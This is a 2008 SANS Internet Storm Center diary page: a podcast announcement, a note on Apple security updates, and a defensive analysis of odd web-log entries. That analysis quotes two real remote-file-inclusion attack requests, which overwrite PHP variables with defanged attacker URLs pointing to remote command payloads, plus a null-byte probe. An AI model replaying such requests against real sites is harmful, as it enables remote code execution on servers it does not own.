Threat Level: green Handler on Duty: Rick Wanner

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2008-07-10 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Podcast Episode Eight Posted

Published: 2008-07-10
Last Updated: 2008-07-10 19:51:34 UTC
by Joel Esler (Version: 2)
0 comment(s)

Thanks to all of those who joined us live last night!  It was great to have that live feedback.  Johannes and I were all live on video and audio, and despite a few hiccups, it was great.  It turns out that we have a great discussion AFTER the live podcast with all the people that are live (you must be a registered stickam member to be able to participate).  I think I may start recording that portion as well, maybe we'll publish that as well!

We published Episode Eight of the Internet Storm Center Podcast last night after the record.

It would be great if we could increase the live listener count, as I'd like to do a live Q&A via the listeners, (and other fun live events).

Go grab it through iTunes.

Direct download of the mp3 is here, for those of you that are not iTunes users.

--

Joel Esler

http://www.joelesler.net

Keywords:
0 comment(s)

One Bushel of Apple Updates

Published: 2008-07-10
Last Updated: 2008-07-10 16:31:52 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Apple is updating many systems this week (in paritcular today) to get ready for the iPhone 3G launch and the new "MobileMe" software. Its not exactly within your scope to cover product updates or releases like that. However, some of the updates released today are security relevant. For example the new AppleTV software includes a number of security patches. A new version of Quicktime ( 7.7.0.43) was released as well (thanks David!).

It is not clear if the new version of iTunes (7.7) released today includes any security fixes.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Keywords:
0 comment(s)

Weblog Observations

Published: 2008-07-10
Last Updated: 2008-07-10 16:18:16 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

In this diary, I will share a few odd log entries from our ISC web logs from the last couple days. Not all of them are attacks. In some cases, they look like honest mistakes, in others, I am not sure what is going on ;-).... of course, there are also some genuine attacks here:

Buggy RSS Reader?

Here a request from earlier today. It triggered an alert as it exceeded the maximum request variable name length:

rss</administrator/components/com_peoplebook/param_peoplebook_php?mosConfig_absolute_path

looks to me like a buggy RSS reader. We attach 'rss' to links in our RSS feed. The remaining "tags" don't look like XSS. So in my opinion not an attack

Remote File Insertion

GET /index.html?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&
GLOBALS=&mosConfig_absolute_path=hxxp: // www. csccog. org/mambots/system/.bash/did.txt?

GET //index.php?_SERVER[DOCUMENT_ROOT]= hxxp: // rosenkrieger . herateam .de/phpRaider
 /authentication/phpbb3/cmd.txt

Now these are "genuine" attacks. The goal here is to overwrite variables and use them for remote file execution attacks. I modified them to prevent accidental clicking. They shouldn't cause any harm to the browser, but you never know...

More Client Bugs? Or someone playing?

GET /diary.html?date=2005%C2%AD05%C2%AD09%E2%80%93%00%00

With this one, I am not sure. The request was blocked because it included a '%00' at the end. The parameter should be a date in this YYYY-MM-DD format. Oddly enough, there was o referer set, but the user agent looked "legit" (easily faked... I know). The same IP address sent other (valid) requests with the same user agent. However, these other requests included cookies, while this particular one didn't... hm. Maybe its someone playing after all? Using a proxy to manipulate requests?

 Monster Cookie from Hell.

This request included 3 oddly formated (and very long) cookies. The cookie names are pc1, pv1, bh and ih. "ih" is by far the longest, about 1180 characters long! The cookies all look very similar. Here is the shortest on (pc1):

pc1=\"b!!!!#!!,Ms!!E(x!!PQ4!#0Lh!!I7JGfb<6!!mT+'k4o:!w1K*!!28a!![
<K!![h(~~~~~:7LG_:7e@YM.jTN\";

The one "feature" that sticks out are a lot of exclamation marks (more so in the other values).

 In conclusion: Keep checking your logs! Let us know if you see something odd.... or if you got more details about the logs I posted above.

 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

Keywords:
1 comment(s)
Diary Archives